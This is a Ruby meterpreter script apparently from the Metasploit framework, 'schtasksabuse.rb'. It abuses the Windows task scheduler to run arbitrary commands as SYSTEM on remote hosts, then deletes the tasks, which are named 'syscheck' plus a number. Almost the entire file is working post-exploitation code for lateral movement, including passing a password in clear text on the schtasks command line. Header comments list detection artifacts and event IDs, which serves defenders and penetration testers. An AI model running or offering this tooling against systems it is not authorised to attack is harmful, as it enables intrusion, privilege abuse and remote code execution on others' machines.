Path: blob/master/scripts/meterpreter/schtasksabuse.rb
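##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##

# Meterpreter script for abusing the scheduler service in Windows
# by scheduling and running a list of commands against one or more targets
# using the schtasks command to run them as system. This script works with Windows XP,
# Windows 2003, Windows Vista and Windows 2008.
# Version: 0.1.1
# Note: in Vista UAC must be disabled to be able to perform scheduling
# and the meterpreter must be running under the profile of local admin
# or system.
#
# Artifacts produced by the code below (useful when building detections or
# reconstructing activity after the fact):
# * Every task is named "syscheck" followed by an integer from 0 to 99.
# * Each command results in three schtasks invocations spawned through
#   "cmd.exe /c" on the host where the session lives: /create (with
#   "/sc once /ru system /st 00:00:00" and "/s <target>"), /run, and, after
#   the configured delay, "/delete ... /F".
# * When -u/-p are supplied, the password is placed in clear text on the
#   schtasks command line, so process-creation logging that captures command
#   lines on the session host will record it.
# * On the target, the create/delete pair is what scheduled-task auditing
#   records (Security events 4698/4699 on Windows versions that have them,
#   when that audit policy is enabled).

################## Variable Declarations ##################
session = client

# Setting Arguments
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-c" => [ true, "Commands to execute. Several commands can be given but separated by commas and enclose the list in double quotes if arguments are used."],
  "-u" => [ true, "Username to schedule task, if none is given the current user credentials will be used."],
  "-p" => [ true, "Password for user account specified, it must be given if a user is given."],
  "-d" => [ true, "Delay between the execution of commands in seconds, default is 2 seconds if not given."],
  "-t" => [ true, "Remote system to schedule job."],
  "-l" => [ true, "Text file with list of targets, one per line."],
  "-s" => [ true, "Text file with list of commands, one per line."]
)

# Setting Argument variables
commands = []
targets = []
username = nil
password = nil
delay = 2
help = 0

# Prints the script description followed by the option table.
def usage
  print_status("This Meterpreter script is for running commands on targets system using the")
  print_status("Windows Scheduler, it is based on the tool presented but not released by Val Smith")
  print_status("in Defcon 16 ATAbuser. If no user and password is given it will use the permissions")
  print_status("of the process Meterpreter is running under.")
  print_status("Options:")
  print_status(@@exec_opts.usage)
end

# Creates, runs and then deletes one scheduled task per (target, command) pair.
#
# @param session  the Meterpreter session used to spawn cmd.exe/schtasks
# @param targets  [Array<String>] hosts passed to schtasks /s; blank entries
#                 and entries starting with "#" are skipped
# @param commands [Array<String>] commands passed to schtasks /tr; blank
#                 entries and entries starting with "#" are skipped
# @param username [String, nil] account for /u, or nil
# @param password [String, nil] password for /p, or nil
# @param delay    [Integer] seconds to wait between running and deleting a task
# @raise [RuntimeError] when the /create output never reports success
def abuse(session, targets, commands, username, password, delay)
  # Same test as the original two-branch version: the /u and /p switches are
  # left out only when neither value was supplied. The password ends up in
  # clear text on every schtasks command line built below.
  creds = username.nil? && password.nil? ? "" : " /u #{username} /p #{password}"

  # for each target
  targets.each do |t|
    next if t.strip.empty?
    next if t[0, 1] == "#"

    # for each command
    commands.each do |c|
      next if c.strip.empty?
      next if c[0, 1] == "#"

      taskname = "syscheck#{rand(100)}"
      success = false

      print_status("Scheduling command #{c} to run .....")
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{c}\" /sc once /ru system /s #{t}#{creds} /st 00:00:00"
      r = session.sys.process.execute("cmd.exe /c #{execmd}", nil, {'Hidden' => 'true', 'Channelized' => true})

      begin
        # check if successfully scheduled
        while (d = r.channel.read)
          if d =~ /successfully been created/
            print_status("The scheduled task has been successfully created")
            success = true
          end
        end

        # check if schedule successful, if not raise error
        unless success
          print_status("Failed to create scheduled task!!")
          raise "Command could not be Scheduled"
        end

        print_status("Running command on #{t}")
        session.sys.process.execute("cmd.exe /c schtasks /run /tn #{taskname} /s #{t}#{creds}")
      ensure
        # Release the channel and process handle even when the raise above
        # fires; previously they were leaked on the failure path.
        r.channel.close
        r.close
      end

      # Wait before scheduling next command
      sleep(delay)
      print_status("Removing scheduled task")
      session.sys.process.execute("cmd.exe /c schtasks /delete /tn #{taskname} /s #{t}#{creds} /F")
    end
  end
end

# check for proper Meterpreter Platform
def unsupported
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end

@@exec_opts.parse(args) { |opt, _idx, val|
  case opt
  when "-c"
    commands = val.split(',')
  when "-u"
    username = val
  when "-p"
    password = val
  when "-t"
    targets = val.split(',')
  when "-d"
    delay = val.to_i
  when "-s"
    raise "Command List File does not exist!" unless ::File.exist?(val)

    # File.foreach closes the file when done; the previous
    # File.open(...).each_line left the handle open.
    ::File.foreach(val) { |line| commands << line.chomp }
  when "-l"
    # The message used to say "Command List File", copied from the -s branch.
    raise "Target List File does not exist!" unless ::File.exist?(val)

    ::File.foreach(val) { |line| targets << line.chomp }
  when "-h"
    help = 1
  end
}

unsupported if client.platform != 'windows'
print_status("Meterpreter session running as #{session.sys.config.getuid}")
if help == 0 && commands.length != 0
  abuse(session, targets, commands, username, password, delay)
else
  usage
end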